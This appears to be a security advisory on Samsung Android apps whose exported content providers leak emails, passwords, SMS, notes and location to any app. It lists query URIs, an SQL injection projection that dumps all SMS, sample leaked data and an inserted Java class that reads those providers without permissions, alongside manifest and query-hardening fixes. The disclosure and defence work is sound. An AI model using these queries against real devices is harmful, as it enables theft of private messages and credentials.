Multiple Samsung (Android) Application Vulnerabilities

Many Samsung applications are pre-installed by default on Samsung Android devices and cannot be removed by the user. Some of these applications make use of content providers which are implicitly exported by default, with the result that other applications on the device can request sensitive information from these providers and successfully obtain it. This is cause for concern because a third-party application containing malicious code does not require any granted permissions in order to obtain sensitive information from these applications. Only applications disclosing potentially sensitive information are reported on in this document.

Package Name: Multiple pre-installed Samsung applications
Date: 2011-12-13
Affected Versions: Samsung Galaxy S2 (I9100XWKI4) – Android 2.3.4; other models running these applications may be affected
CVE Reference: None
Authors: Tyrone Erasmus, Mike Auty (Channels SQLi)
Severity: High Risk
Local/Remote: Local
Vulnerability Class: Android Content Providers
Vendor: Samsung
Vendor Response: Vendor has updated all vulnerable software; firmware releases after 13th March 2012 contain the fixes.

Description

The following applications allow the retrieval of sensitive information from their content providers without any granted permissions:

Package | Obtainable Information | Version
com.seven.z7 (Social Hub) | Email address and password; email contents; instant messages | 7.52.10101
com.sec.android.socialhub (Social Hub) | Social networking messages | 2.00.00001
com.sec.android.im (IM) | Instant messages | 1.00.10201
com.android.providers.telephony (Dialer Storage) | SMS | 2.3.4
com.sec.android.provider.logsprovider (LogsProvider) | SMS; email contents; instant messages; social networking messages | 1.0
com.sec.android.widgetapp.weatherclock (AccuWeather.com) | Location | 11.06.27.01
com.sec.android.app.minidiary (MiniDiary) | Notes; photos; photo locations | 1.0
com.sec.android.app.memo (Memo) | Notes | 1.0
com.sec.android.widgetapp.postit (Minipaper) | Notes | 1.0
com.osp.app.signin (Samsung Account) | Encrypted account information | 1.0

Impact

Malicious applications installed on the same device as the vulnerable applications could steal sensitive information from the user and transmit it back to the attacker.

Cause

These vulnerabilities are present because no read or write permissions are set on the <provider> elements in each vulnerable application's AndroidManifest.xml file. On this version of Android a provider without an explicit android:exported attribute is exported by default, so any application on the device can query it.

Interim Workaround

Avoid using the vulnerable applications if you do not have access to the firmware update. To clear information stored in these applications go to Settings→Applications→Manage Applications and press “Clear data”.

Solution

In the AndroidManifest.xml file of each application that contains a content provider, it was recommended that read and write permissions be set. An example is shown below:

<provider android:name=".db.Provider" android:authorities="com.example.app"
  android:readPermission="com.example.app.provider.permission.READ"
  android:writePermission="com.example.app.provider.permission.WRITE" />

This means that an application wanting to read or write to this content provider needs to hold the stated permissions in order to do so. The permissions themselves must be declared with <permission> elements; declaring them with android:protectionLevel="signature" restricts them to applications signed with the same certificate as the provider's own package. Where no other application needs access at all, setting android:exported="false" on the <provider> element removes external access entirely.

Technical Description

The following section is organised by the information that is obtainable by an unprivileged application. The premise of this section is that an application with no granted permissions can perform a query on the specified content providers in order to obtain the targeted information.

When querying a content provider, the developer supplies the pieces of a SQL statement through the query method, which looks like this in Android:

query(uri, projection, selection, selectionArgs, sortOrder)

The provider uses these parameters at various points of the SQL statement it constructs: the projection becomes the column list, the selection becomes the WHERE clause, selectionArgs are bound to ? placeholders in the selection, and sortOrder becomes the ORDER BY clause. Because projection, selection and sortOrder are typically concatenated into the statement as text, SQL injection vulnerabilities are often present in these parameters on content providers.
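As an added example (not code from the advisory or from Samsung), the following Android class shows what "no granted permissions" means in practice: a third-party application that declares no <uses-permission> elements queries one of the exported providers through ContentResolver and collects the rows. The URI and column names in the example call come from the advisory; the class name, method names and row formatting are assumptions for illustration.

```java
// Added example, not part of the original advisory: an unprivileged app reading
// an exported content provider. Only the URI and column names are from the
// advisory; everything else is illustrative.
import android.content.ContentResolver;
import android.database.Cursor;
import android.net.Uri;
import android.util.Log;

import java.util.ArrayList;
import java.util.List;

public final class ProviderDump {
    private static final String TAG = "ProviderDump";

    /**
     * Queries a content provider and returns each row as "col1=val1 | col2=val2".
     * A null projection asks the provider for all columns. Returns an empty list
     * if the provider rejects the caller, which is what happens once a
     * readPermission is enforced and this app does not hold it.
     */
    public static List<String> dump(ContentResolver resolver, String uri,
                                    String[] projection, String selection,
                                    String[] selectionArgs) {
        List<String> rows = new ArrayList<String>();
        Cursor c = null;
        try {
            // Same five parameters as ContentProvider.query(). They end up inside
            // the provider's SELECT statement, which is why projection and
            // selection are also the usual SQL injection entry points.
            c = resolver.query(Uri.parse(uri), projection, selection, selectionArgs, null);
            if (c == null) {
                return rows; // provider refused or does not know the URI
            }
            while (c.moveToNext()) {
                StringBuilder sb = new StringBuilder();
                for (int i = 0; i < c.getColumnCount(); i++) {
                    if (i > 0) sb.append(" | ");
                    sb.append(c.getColumnName(i)).append('=').append(c.getString(i));
                }
                rows.add(sb.toString());
            }
        } catch (SecurityException e) {
            // Expected after the vendor fix: the caller lacks the provider's readPermission.
            Log.w(TAG, "Access denied for " + uri + ": " + e.getMessage());
        } finally {
            if (c != null) c.close();
        }
        return rows;
    }

    /** Example call using the Social Hub account list described in the advisory. */
    public static List<String> socialHubAccounts(ContentResolver resolver) {
        return dump(resolver,
                "content://com.seven.provider.email/accounts",
                new String[] {"user_name", "provision_name"},
                null, null);
    }
}
```

On an unpatched device the returned rows contain the registered account names and services shown in the next subsection; on a patched device the query throws SecurityException and the list comes back empty, which is the behaviour the manifest permissions in the Solution section are meant to produce.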

Email

com.seven.z7 (Social Hub)

Registered user accounts within Social Hub and their associated service.

Uri: content://com.seven.provider.email/accounts
Projection: user_name, provision_name
Response:
user_name | provision_name
testaccount@yahoo.com | Yahoo! Messenger
testaccount@yahoo.com | Yahoo! Mail

com.seven.z7 (Social Hub)

The password for instant messaging accounts within Social Hub. On services such as Yahoo and Google a single credential serves both email and IM, so this is often the email account password as well.

Uri: content://com.seven.provider.email/dbprefs
Response:
_id | category | type | key | value | flags
...
242 | Account-6 | 5 | Z7_IM_CLIENT_SETTING_PASSWORD_STRING | Password123 | 0
...

com.seven.z7 (Social Hub)

Email messages.

Uri: content://com.seven.provider.email/emails
Projection: _id, _from, subject, body
Response:
_id | _from | subject | body
...
30 | friend@yahoo.com | Test subject | Email contents
...

com.sec.android.provider.logsprovider (LogsProvider)

Email messages.

Uri: content://logs/email_seven
Projection: messageid, address, m_subject, m_content
Response:
messageid | address | m_subject | m_content
...
30 | friend@yahoo.com | Test subject | Email contents
...

All email accounts registered in Social Hub have their email contents logged. This query to the logs content provider returns the same data as the com.seven.provider.email provider, except that the logs persist even after the account is deregistered or removed from Social Hub.

Instant Messages

com.seven.z7 (Social Hub)

Get all contacts.

Uri: content://com.seven.provider.im/contacts
Projection: contact
Response:
John
Paul
Susan

com.seven.z7 (Social Hub)

Get instant messages from Social Hub.

Uri: content://com.seven.provider.im/messages
Projection: _id, contact, account, body
Response:
_id | contact | account | body
...
14 | John | 6 | Hi, how are you?
...

com.sec.android.provider.logsprovider (LogsProvider)

Get the same instant message as above, except from the logs.

Uri: content://logs/im
Projection: account_id, name, m_content
Response:
account_id | name | m_content
...
6 | John | Hi, how are you?
...

The logs persist even after an IM account has been deregistered.

com.sec.android.im (IM)

Get the same instant message as above, except from the IM application itself.

Uri: content://com.tecace.app.convprovider
Projection: _id, accountId, buddy_name, message
Response:
_id | accountId | buddy_name | message
...
3 | -1 | null | Hi, how are you?
...

SMS

com.android.providers.telephony (Dialer Storage)

All SMS messages.

Uri: content://channels
Projection: * FROM sms;--
Response:
_id | thread_id | address | person | date | protocol | read | status | type | reply_path_present | subject | body | service_center | locked | error_code | seen | deletable | hidden | group_id | group_type | delivery_date
...
572 | 3 | +27821234567 | null | 1323444871859 | null | 1 | 0 | 2 | null | null | This is a message from me to you | null | 0 | 0 | 1 | 1 | 0 | null | null | 1323444881072
...

SQL injection exists within the projection and selection parameters of the channels content provider: both are concatenated into the SQL statement as text, so the projection above closes the column list, selects from the sms table instead and comments out the remainder of the provider's own statement, returning every SMS message in the database.
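To show how the projection above reaches the database, here is an added example (not Samsung's code, which is not public) of the provider-side pattern that produces this kind of injection, alongside a hardened query(). The table name "channels", the column names in the allow-list and the class and method names are assumptions for illustration; only the behaviour of SQLiteQueryBuilder is real.

```java
// Added example, not from the advisory: a content provider query() that splices
// caller-supplied projection and selection into SQL, and a hardened version.
// Table and column names are assumed for illustration.
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;

import java.util.Arrays;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;

public final class ChannelsQueries {

    /** Typical vulnerable query(): projection and selection go straight into the SQL text. */
    static Cursor vulnerableQuery(SQLiteDatabase db, String[] projection,
                                  String selection, String[] selectionArgs) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("channels");
        // With no projection map the builder joins the projection strings verbatim,
        // so a projection of {"* FROM sms;--"} produces
        //   SELECT * FROM sms;-- FROM channels
        // SQLite runs the first statement and the comment swallows the rest.
        // The selection is likewise appended as the WHERE clause without checks.
        return qb.query(db, projection, selection, selectionArgs, null, null, null);
    }

    /** Columns a caller may ask for; anything else is rejected before SQL is built. */
    private static final Set<String> ALLOWED = new HashSet<String>(
            Arrays.asList("_id", "name", "type"));

    /** Hardened query(): projection limited to known columns, literals only via selectionArgs. */
    static Cursor hardenedQuery(SQLiteDatabase db, String[] projection,
                                String selection, String[] selectionArgs) {
        // Reject unknown column names explicitly so the failure is the provider's
        // decision rather than whatever the builder or SQLite makes of the text.
        if (projection != null) {
            for (String col : projection) {
                if (!ALLOWED.contains(col)) {
                    throw new IllegalArgumentException("Unknown column: " + col);
                }
            }
        }

        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("channels");

        // A projection map makes the builder emit only the mapped names; combined
        // with the check above, caller text never becomes part of the column list.
        Map<String, String> map = new HashMap<String, String>();
        for (String col : ALLOWED) {
            map.put(col, col);
        }
        qb.setProjectionMap(map);

        // Available from API 14: the builder also validates the selection text
        // against sub-query style injection. Not available on the Android 2.3.4
        // build in the advisory, so the check above matters on its own.
        qb.setStrict(true);

        // Callers must pass values through selectionArgs, e.g. selection "type=?"
        // with selectionArgs {"1"}; bound arguments never become SQL text.
        return qb.query(db, projection, selection, selectionArgs, null, null, null);
    }
}
```

The hardening does not replace the manifest permissions from the Solution section; it limits what a caller that is allowed to query can extract, while readPermission decides who may call at all.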

com.sec.android.provider.logsprovider (LogsProvider)

First 50 characters of SMS messages.

Uri: content://logs/historys
Projection: number, m_content
Selection: number like '+%'
Response:
number | m_content
...
+27821234567 | This is a message from me to you
...

Social Networking Messages

com.sec.android.socialhub (Social Hub)

Messages from Social Networks.

Uri: content://com.sec.android.socialhub.unifiedinbox/messages
Projection: name,m_subject,m_content
Response:
name | m_subject | m_content
John Smith | Birthday | Are you coming to my party?

Notes

com.sec.android.app.minidiary (MiniDiary)

All notes entries, photos and photo locations.

Uri: content://com.sec.android.providers.minidiary.MiniDiaryData/diary
Projection: _id, location, date, longitude, latitude, picture_file, note
Response:
_id | location | date | longitude | latitude | picture_file | note
1 | Germany, Hesse | 2011.01.11 | 9804903 | 51115599 | /data/data/com.sec.android.app.minidiary/files/picture/1323636867660.jpg | Beautiful!

It should also be noted that on the Android versions current at the time of writing, reading the contents of the SD card requires no permission, allowing any application to retrieve files from it and upload them to an attacker.

com.sec.android.app.memo (Memo)

User notes stored in this application.

Uri: content://com.samsung.sec.android/memo/all
Projection: _id, title, content
Response:
_id | title | content
1 | 20111211 | Note contents

com.sec.android.widgetapp.postit (Minipaper)

User notes stored in this application.

Uri: content://com.sec.android.widgetapp.postit/postit
Projection: _id, body
Response:
_id | body
1 | My first postit!

Miscellaneous

com.sec.android.socialhub (Social Hub)

Name of the owner of the device.

Uri: content://com.sec.android.socialhub.unifiedinbox/sns_msg_receiver_map
Projection: receiver_name
Response:
Tyrone Erasmus

com.sec.android.widgetapp.weatherclock (AccuWeather.com)

General location of the owner of the device.

Uri: content://com.sec.android.widgetapp.weatherclock
Response:
NAME | STATE | LOCATION | MAIN_DISPLAY | SUMMER_TIME | LATITUDE | LONGITUDE | PROVIDER
Pretoria | Gauteng, South Africa | cityId:305449 | 1 | 0 | -25.7315 | 28.21821 | 0

com.osp.app.signin (Samsung account)

Obtain encrypted Samsung account settings.

Uri: content://com.osp.contentprovider.ospcontentprovider/identity
Response:
Value | Key
<base64_value> | UserID
<base64_value> | EmailID
<base64_value> | Password
<base64_value> | MobileCountryCode 
<base64_value> | AuthToken
<base64_value> | AuthTokenSecret
<base64_value> | BirthDate
<base64_value> | UserDeviceID

It should be noted that each value shown above is an encrypted string that has been base64 encoded.

If the mechanism that encrypts and decrypts this data is found to be weak, the user’s Samsung account would be compromised.

com.android.providers.settings (Settings Storage)

Portable Wi-Fi hotspot credentials. Reading content://settings/secure requires no permission (only writes are guarded by WRITE_SECURE_SETTINGS), so the hotspot SSID and password are available to any application.

Uri: content://settings/secure
Response:
_id | name | value
2736 | wifi_ap_passwd | h0tsp0tp@ssw0rd
...
2859 | wifi_ap_ssid | Hotspot1234